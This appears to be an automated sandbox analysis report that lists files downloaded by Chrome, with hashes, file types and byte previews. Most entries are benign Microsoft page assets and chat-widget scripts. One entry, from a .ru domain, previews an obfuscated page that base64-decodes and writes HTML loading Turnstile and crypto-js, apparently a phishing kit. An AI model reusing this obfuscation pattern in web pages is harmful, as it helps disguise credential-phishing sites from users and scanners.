                                                                        SHA-256:502CC25E293B1B9C0D3C40E2B6B329E4A30E16EFA64FD7F0E6C65AC01E21AB0E
                                                                        SHA-512:EF504F888EFAA4D8DC2E1CF202C7B4FE8A4DD6DCB0147D14FFD7839A0B4A41EEE9F09B84F726D6497CA567D9164F706BF966B692B5E42D76A73A6F97AA0B0B84
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Desktop-solutions-tab4-img4@2x?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1312&hei=984&qlt=100&fit=crop"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............7....(iinf..........infe........av01Color....jiprp...Kipco....ispe....... ........pixi............av1C........colrnclx...........ipma.................7.mdat.....*h.......2...D.......N....-O..xu..P.m..<..)..y..4.....A*z..v.....Ib....m.......+.Se....3`Wp........&..2.|.V..ntq.F.q./_....ri|4%..,...`9....5{T.TF..K....Qo.....-.].wk.Vn]...[...e..*R..N..Y/"|.(.....U.........n....6b.tZ^.-.b..HAL.N...k........Ea....>@..{..3Q..I..Wh...m..hF.n.....9.Tkd...o.Q'.dG.......|s`.0.N'.[..J.g.)..b.F......Z. ..;.......{.;.x..I.C.!."s..p.R.LH.....}......1..-...72.1tC...@"|~.]....v.".2....K.^.R.&.....!...m.K.t...8X..iP..T.i8....q.q...|....f.l.y..:....W........}.C..[."..\n...E....FB.=n.O9Di.1.= !&.......o..vxv...c.}..Ie......2M.H.....I.....o....;..f.....5..n..3..c._...'..^.dq.{L..0..n....@24K..H.Q{.a.........Hr....../.:...k.Kx.*.E.}E...n\}ve..@........c
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):192555
                                                                        Entropy (8bit):7.998580423968982
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:BB27CCC8BE85AA39E64AB7AE397FE838
                                                                        SHA1:544251D751D591930B01361768DAA2CD811372C0
                                                                        SHA-256:B148B5AE58A47D859E63A3F58E33537E67D816D9BC6B1A53334413E139460E9B
                                                                        SHA-512:4BBD257996F6B9B16ABC58DB70C33074EDBF64719AB37D2E32AFD8ECA769295657ED2965D8F2D52CFD5F88E682439C45763BF6C4954C05E1F5959DF9F89FFBFA
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Desktop-solutions-tab2-img5@2x?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1312&hei=984&qlt=100&fit=crop"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe....... ........pixi............av1C........colrnclx...........ipma...................mdat.....*h.......2...D.......N....-O..xu..P.m..=.W.Yqd..1.....&...s.@2.`"..8...._..l.).%.<....{.Y%1z.@6.D.<~.&;....e..m...RAN..%...e>..........s..f..P1.......`.o.;....E...9./......G.%"...u9./_[....s..........f..8.m........@{.(.WG.....k./.v5.5.f....."...}.(.$..._..!.Zg.....y_...f.....&i..Q..[(x.sZ.%........6.8^..-.e$/#].[...:.uq...Y.-....U....%*`...[...w./.E&Y.y.=.He....0m. ....9.h.K.......=]..H.j.YE.r..f..\..RyR....J.iQ.(..2[.!.i.G....+.....X.....6....]oE.U..+.-.l.8...z..1..-fQ.N]..:....W#.>.t...a..'7.....".(p.QW`.........vl5I*..N.. .X.u..dp.j~.4...l!w...:).vZ....r...0....B.gl...4h.....v........%...._...>.T.Lr.+.......RcG.....z.l.Z.G.}E...l...G...R.../i.g....u.O..-.-.[..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 24x25, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):7.559473089315246
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DE5BAE9AB05834B67615DB6553E013AB
                                                                        SHA1:FE32FBD7BEE3E754FE5533E64C978F976E717BE9
                                                                        SHA-256:FF64F237420BBF9BEF166C2726022C7761504EE59FA04F75DD727FA4BB88D471
                                                                        SHA-512:878E0A747774A1E1618732A24D99B6EA48A03C678DA42700D8D448149664BF30CC2930EA29F8F8B47B30518BB8CD7EA046A931DE1565C6398F8800CE0854EDF4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8 .........*....>1..C"!..T...Z@...=W...........+....V`..?.>N2..n..._...<.......+...?.g...P..hj....q.....Fn.).i..Zs......k;...y.....K.et............F......^.E.:.}.A..i/....5..ge...>?7..0.h.....l-k>.....{t....c...u9..dS....~.x...5..Ze.Ur.}...uf........,I.s.s..A....T..N......Z.?......_9...G....%..MG......UUx.....{.}&......}......7...C.....].d....P..Q|;...Ni..[5..!&...J....M..oTV..DV...>xK.......z....?..l...*.....Y..7...K........y....]e....l.....Hq.y.*<5..:X.....2...h...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):295672
                                                                        Entropy (8bit):7.992774587661087
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:1A1B05476B2C43F6BC7A1E8248B3FAC1
                                                                        SHA1:7F8394E275C407DC8AFA011CA99743202B4421A9
                                                                        SHA-256:B531857441EB6F6EC61FE768CC4CCE781D5492F575E0BFB50AF6C94E9E2CAF85
                                                                        SHA-512:D976DA2F8A7A81902D2A25B9AEE01105A4F5FC8BB8B48BCB86D8042F6963EFEC329A00B5C1F1613170B651ABA0EFFB20569217565A21E08B3777B74BD516F075
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8L.../....Hl.H.$...Tu............@.t .......O.;............W^..p=.?$..WB.~...d.z.vfwF.@$v.~V...Hg..J.+I_.D.s..{.>w..].N...r.:.{..$....,..l.p.w..t0..l 8.........c...+......$./.l..nv.......Y.-.c......A.g.g<..v.C'..9...g.....7.&dH|{.r.9g...I.6...1.s..snb.mn@p]....[{.s..$...p]...|....8....v.....H.%.>. .46.\}]....>..I..R.....nG.R.......W_...XR.f.a.7..\1Ti..*.....1Mw_..VRU.j......j~.g.%Q.}....,.J3c!.Cw.5#i......|J.h...]..H.@.RR.J..Aw?x.Q...$..[RUw..&.z......O.TJ.).....zr..TP...*.U...O~?.dBA..8... .~...d...(.PH...^.^7..m.Y58...#.e.z~......`...EE...N2.'...s.....;4.eh.....m.t..`...l".d.I..D.dC......B.E.h...CH....C..D.m..(....m....HI).x..!......)...E.q.B.!!.....&..H.dH.M.i..H.h..%$.o..ja..D.g;....(9......\K\.+).=..\Q..Sqid...D"CHdhaw.....cO....|./....F../...p.zX.....Y..'![.x...Q..P......../....@..4iW.p?..B.w._K..>.E....d:%-.[R.....0.`}...z,.|..-......$.e....8]...Q....#...!..|#..."..fH$A..2e9W...'X....0M..<xB...c..a....b>...d....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (9606), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):9606
                                                                        Entropy (8bit):5.189330251800402
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A6802AB98C4236C76CF9D79D73C108F8
                                                                        SHA1:069A5381EF4081818B8CB0B2CA5E0427052DA092
                                                                        SHA-256:3B0944DFEA209566C3A89112514FFA483A8518BCDD8B3F0FAB9AD70A08215A97
                                                                        SHA-512:019DF91CB63A5D600C0FFB953E7A79EC3BC3FB82E372B931A06EF8F9856C9A6021EC9068B36EC7214A3F38326962505BC6E25886FFB3E6CAB113068BCE729A94
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://lpcdn.lpsnmedia.net/le_re/3.61.0-release_1396603402/jsv2/overlay.js?_v=3.61.0-release_1396603402
                                                                        Preview:window.lpTag=window.lpTag||{},lpTag.taglets=lpTag.taglets||{},lpTag.taglets.lightbox=function(){var n="",e={backgroundColor:"#000000",backgroundImage:"",opacity:0,filter:"alpha(opacity=0)",position:"fixed",top:0,left:0,bottom:0,right:0,zIndex:107108};return{_V:"1.3",name:"lightbox",init:function(){},show:function(){var t;(t=lpTag.taglets.lpJsonToDom.convert({containers:{css:e}})[0]).className=t.className+" LPMlightbox",lpTag.taglets.utils.appendToPage(t),n=t.id,t=lpTag.taglets.utils.geObjById(n),lpTag.taglets.lpAnimate.animate(t,{name:"opacity",targetVal:.7},{easing:"easeOutQuart",duration:1e3})},remove:function(){var t,e;t=function(){var e=lpTag.taglets.utils.geObjById(n);if(void 0!==e&&null!=e)try{e.parentNode.removeChild(e)}catch(t){e.style.display="none"}},e=lpTag.taglets.utils.geObjById(n),lpTag.taglets.lpAnimate.animate(e,{name:"opacity",targetVal:0},{easing:"easeOutQuart",duration:1e3,callback:t})}}},window.lpTag=window.lpTag||{},lpTag.taglets=lpTag.taglets||{},function(){functi
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (566)
                                                                        Category:downloaded
                                                                        Size (bytes):61208
                                                                        Entropy (8bit):5.486865205392623
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F381D5147C85EE687EA8FBEF32C83D37
                                                                        SHA1:EB654ABAF1DF5CCB830763D5A40140B5C093C49F
                                                                        SHA-256:2D0832B29F1B3347C4B5046C373A635884B76ABAF2DE3FF650EE74D8B46F001E
                                                                        SHA-512:CD6B4DEB925037A6C0CF4BAA5AB600891139D99BFB9173D3F3DD4660D281A6266B5709D53770395E7459D9D2060E37F06295E8F9719A21F3EA8433D9E2206E65
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-polyfills.min.ACSHASHf381d5147c85ee687ea8fbef32c83d37.js
                                                                        Preview:/*. Copyright (C) 2013-2015 by Andrea Giammarchi - @WebReflection.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN AN
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):9539
                                                                        Entropy (8bit):4.727148213062689
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9EEA5F80FED74A300CCBBAA4DC41DF2A
                                                                        SHA1:08568A33ED8E994237DB997AFABF85723AD7E92D
                                                                        SHA-256:32E9B0F50257F381F3F1F3002B7DFD3AF138916429D53FAAC58FD9D0D1550CF4
                                                                        SHA-512:0114AC63E722B5628605986B2F2A483F2822CE043F988638DE3DEE202BA96D91B5AE723D585558540A123C9978BEC169C90FF98E567ED74053D57EDE7F1340DB
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/**.* This function is to add source parameter through JS in the hyperlink..*/.$(document).ready(function () {. const appendReferrerLinks = document.querySelectorAll('[data-isautoappendreferrer="true"]');. if (appendReferrerLinks.length) {. const lang = "/" + document.documentElement.lang?.toLowerCase();. let currentUrl = window.location.href.toLowerCase().replace(window.location.search, "").replace(lang, "");. if (currentUrl.endsWith("/")) {. .currentUrl = currentUrl.slice(0, -1);. }. const sourceLink = "srcurl=" + encodeURIComponent(currentUrl);. appendReferrerLinks.forEach(link => {. if (!link.href.includes("srcurl=")) {. const separator = link.href.includes("?") ? "&" : "?";. link.href = link.href + separator + sourceLink;. }. });. }.});./**. * Query Parameter Passthrough Utility. *. * This utility updates anchor tags in a web page by modifying the. * 'href' attribut
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):16
                                                                        Entropy (8bit):3.875
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:900914BC560773CAF9E095A8F17F6E37
                                                                        SHA1:51E0C4C0C0902C50F0D7E7581E0EDB0DCC191D7D
                                                                        SHA-256:08E437A7674E58F221D4EE6D5742EF2643929FB566511709F988B5EBE4FE4C1E
                                                                        SHA-512:2B48B170CEEBD6DB978D4DC79710A746903473B7C378FA25D6564AD6F6D2141A080E83C66D79688C35D3146F6DBFE996D3232C7A643F7767B8124C18065DB1C2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAm5eahqsCUW7BIFDb2Fgw8=?alt=proto
                                                                        Preview:CgkKBw29hYMPGgA=
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (42133)
                                                                        Category:downloaded
                                                                        Size (bytes):138268
                                                                        Entropy (8bit):5.224497765711851
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5B85413B96AF340238B93068CDB641FB
                                                                        SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                        SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                        SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/shell/_scrf/js/themes=default/54-af9f9f/d4-fb1f57/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/f9-a5b2ce/db-bc0148/dc-7e9864/6d-c07ea1/6f-dafe8c/f6-aa5278/73-a24d00/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/d0-e64f3e/92-10345d/79-499886/7e-cda2d3/58-ab4971/74-d51c79/e0-3c9860/de-884374/1f-100dea/33-abe4df/2b-8e0ae6?ver=2.0&_cf=02242021_3231&iife=1
                                                                        Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):539759
                                                                        Entropy (8bit):5.4986714101077405
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8DFEBF9C815A6C4BDBC9A1FE5248FAAA
                                                                        SHA1:0FA4B8BEA14B5725A5D92598888A6001DBD129AB
                                                                        SHA-256:CED87C7057EBB3C6918251D6226F7EB6B221D579308C8E49054D9F0FFED7752E
                                                                        SHA-512:AB9783806520FF587FB1B25AB4E9D2F3B4085B842C5952965A30B0525A25568E120F63A90BEBD6D827C0307E934EAE3E2C20CA3184BF72F40780D885B34274ED
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://lptag.liveperson.net/lptag/api/account/60270350/configuration/applications/taglets/.jsonp?v=2.0&df=undefined&s=azure-leadgen-en-us&b=undefined
                                                                        Preview:lpTag.callback({"taglets":[{"name":"lpSecureStorage","type":0},{"name":"lp_testingTool","type":0},{"name":"lp_sdes","type":0},{"name":"cobrowse","type":0},{"name":"scraper","type":0},{"name":"lp_ada_enhancements","type":0,"parameters":[{"id":"enhancements","value":"{\"options\":{\"debug\":\"false\"},\"logoCSSFix\":true,\"surveyTabFix\":true,\"headerTextCSSFix\":true,\"menuKeyCloseFix\":true,\"minMaxRoleFix\":true,\"agentIsTypingFix\":true,\"offlineCSSFix\":true,\"inviteKeyCloseFix\":true,\"offlineWindowNarratorFix\":true,\"cancelBtnCSSFix\":true,\"muteBtnNarratorStateFix\":true,\"engagementFix\":true,\"overrideStyles\":{\"cancelBtnCSSFix\":\"color: #000 !important; background: #fff !important;}#lpChatButton a:focus,#lpChat a:focus, #lpChat button:focus, #lpChat input:focus, #lpChat textarea:focus, #lpChat select:focus, #lpChat .lp_textarea_field:focus, .lp_confirm_button:focus, .lp_cancel_button:focus, .lp_action_item:focus, .lp_dialog_input:focus {outline: #000000 dashed 1px !importan
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (7469), with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):19891
                                                                        Entropy (8bit):5.8770761302708365
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8B1B75847D699A8371C57DA39390B761
                                                                        SHA1:D8D4ACD9EA69303F1722677B9932EBB54D0B3201
                                                                        SHA-256:1B36D847E7FB8C89C4498DDDE079D12DEFB0B8355A40620434C6DBE55749AB14
                                                                        SHA-512:AA56B464A5608048FE29F4D434C641F87F44079A58D954AD89233825BEC09BB0C72B8239398449825A11C2384C4F5660E66BDF2766E80E4053CF1254802BE696
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://ust.tolegtynl.ru/Lhkb/
                                                                        Preview: The only place where success comes before work is in the dictionary. -->.. Leadership is not about being in charge, it&#039;s about taking care of those in your charge. -->..<script>....if(atob("aHR0cHM6Ly8wdlgwLnRvbGVndHlubC5ydS9MaGtiLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCi
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):188025
                                                                        Entropy (8bit):7.998957319640903
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:70745D72DC33281ADA2CB44A99515C1D
                                                                        SHA1:66937D160797D9CD3B83EF8A82C877666D587B06
                                                                        SHA-256:C6EE5C268B2B087050855AA1EFDDBCA69155DE4DBF1B4B125A4663DADD0F7A2A
                                                                        SHA-512:41316CDDA85A2354F6BB5DA7B566778D79592BB84447E7EDE9F93C07ACD05A8DF6861BD56D9D0DDD5B729A848D7F300D0EC84959215E9C33DD7133EB76417DE5
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Desktop-solutions-tab4-img1@2x?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1312&hei=984&qlt=100&fit=crop"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................_...(iinf..........infe........av01Color....jiprp...Kipco....ispe....... ........pixi............av1C........colrnclx...........ipma..................gmdat.....*h.......2..D.......N....-O..xu..P.m...Z.7.;..Y..Z...=....7?.$...0...b.F..#0.x{.:.R.k&...M1r.#....Dn.....U.VK.p.5. 0.TZ.=s.z...f...........[D.8|..t..i.mZ...S............$.==....k.3i.....Yj8....0K9PA...6c....Mi.@..$.(.K& ...".....OS.h.....I...AD.%...T@.t.9Q)....!.m.NfX.(.....Hs..q.|).*...f..}. V.3z.......9.W-.........cu..;..-}....(0.ST...:..6.<).]...%..jY..n....k..Z....k_....B....A%.......r......{R.!c..7Rm..F..].x*.w.saT..Ex>P.".K.._R....X.?B ...y.W."c..29..w..kS.puH^...N.m...._..S.K.UX..#w@.`..W.". z.t..i4..U0...lP....i../Y=....H....t.....J......|pN^.bs..../.^......)`e...wo..Sw......&...Q..U.NfY.;...R.Fa........h kqfvWC|OfY..;-/u..p....`T.-J.....'.....2.35..V]T.....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):176717
                                                                        Entropy (8bit):7.998134877463411
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:7F6DE69056E404A41FAEB4FE86AB5C02
                                                                        SHA1:F9B10947C073E75BB1B70CDB87DF7890898D4AE4
                                                                        SHA-256:2AD18EE9076E6FBB2650B1746B193151178086978E481BE034E339FB7C77C75B
                                                                        SHA-512:35A92B7FEC62B968D8B2236D787AA4F646B6FA6C9EEE28F72633801B9AA424B440EF486D2AF923D8AB84C15706064CEC92D79A6488FCB710C267DDC4E1B13064
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/391110-Desktop-VerticalAccordion-Solutions-Cloud-Tab2-800x636-11192024?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=656&hei=528&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D................b.............6...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma..........................mdat.....&h.'.@2..D|.I....:..U2....3......5.f.....Q..7L@.G..4Q&.H...F4.'.@...U.0.(.x.....w.e.L=..9....@.;y....(n....WS....l.....C...3..<en*(.d..H.O.".^.A.i.w...|p.......|....W.l.#.=.3.7.2.V..0..m.ya_..W..`.6.1fF.../c.&.....Z.h...'..(.......+..[xv=....l*.\.U.f.&..a.c..Y.9....7.6....../l...g....E3.&..Z......&h.'.....2...D....U.....$...e.P..w........^wy..B.V.<..1.!.o...f.H7.Ri...a?k(.jC.....vD.,.J...G.-..7.5.r.Hg.#2CW..#\...v%:eP<Ep.IG...a...!..........M..m...<.$..L7.nI*.l...)}..z......kB.....G.H/D...\HB[P..O..c..~_/ .Z._.....Lxd...z..`.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:dropped
                                                                        Size (bytes):4239
                                                                        Entropy (8bit):5.242556801407524
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:75537A781B00800EBBBE4CBA5B2D6ABC
                                                                        SHA1:D601CD25E699E62B2A3046437148F47C256B65F3
                                                                        SHA-256:CB27E5FB4B6156B40D9EF2DDF0F5054C1C24E4D9E7F0E9B151A38AA79EF4D5F0
                                                                        SHA-512:DA243A4FB2CD1124DA53AD3DDA2AD18035FC59B2FA09931CB5F8C42D0139818ECB333AF0418347C0778B5D12ADCE655B7A6B2ABC659576BD938F589BF8D3921E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:<svg width="28" height="28" viewBox="0 0 28 28" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_54_10643)">.<g clip-path="url(#clip1_54_10643)">.<g filter="url(#filter0_ii_54_10643)">.<path d="M23.3953 6.09219C20.3657 6.09219 17.4144 5.01898 14.5228 2.85031C14.2195 2.62281 13.8024 2.62281 13.4991 2.85031C10.6075 5.01898 7.65619 6.09219 4.62656 6.09219C4.15539 6.09219 3.77344 6.47414 3.77344 6.94531V12.9172C3.77344 18.606 7.13767 22.7858 13.6982 25.3703C13.8992 25.4495 14.1227 25.4495 14.3236 25.3703C20.8842 22.7858 24.2484 18.606 24.2484 12.9172V6.94531C24.2484 6.47414 23.8665 6.09219 23.3953 6.09219Z" fill="url(#paint0_linear_54_10643)"/>.</g>.<g filter="url(#filter1_dii_54_10643)">.<path d="M12.5966 17.243L19.4216 10.9868C19.7689 10.6684 19.7924 10.1287 19.474 9.78141C19.1556 9.43409 18.616 9.41063 18.2686 9.72901L12.0458 15.4333L9.77962 13.1671C9.44645 12.834 8.90628 12.834 8.57312 13.1671C8.23995 13.5003 8.23995 14.0405 8.57312 14.3736L11.4169 17.2174C11.73
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65302)
                                                                        Category:downloaded
                                                                        Size (bytes):304858
                                                                        Entropy (8bit):5.098842090973851
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:561C834597FB9BC5AAC4021E21E006BE
                                                                        SHA1:C535802C0C6171B4BE1A776034C330418B36983D
                                                                        SHA-256:D8BAB22B1506E8444C64D92431F521964F658C380F5D32738AFEA85C15F03013
                                                                        SHA-512:748BFA3F917C8E75699A52FFE0AB2F753262D1B73810ACF68523930B665EF10A85329BD63A2A7B39746154554EA7A195270D1326C98C77DE72F75E4EB14CBB2F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH561c834597fb9bc5aac4021e21e006be.css
                                                                        Preview:@charset "UTF-8";/*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */@font-face{font-family:MWF-FLUENT-ICONS;src:url(resources/fonts/MWFFluentIcons.woff2) format("woff2"),url(resources/fonts/MWFFluentIcons.woff) format("woff"),url(resources/fonts/MWFFluentIcons.ttf) format("truetype")}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf) format("ttf");font-weight:400}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-euro
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:1
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (27332), with no line terminators
                                                                        Category:downloaded
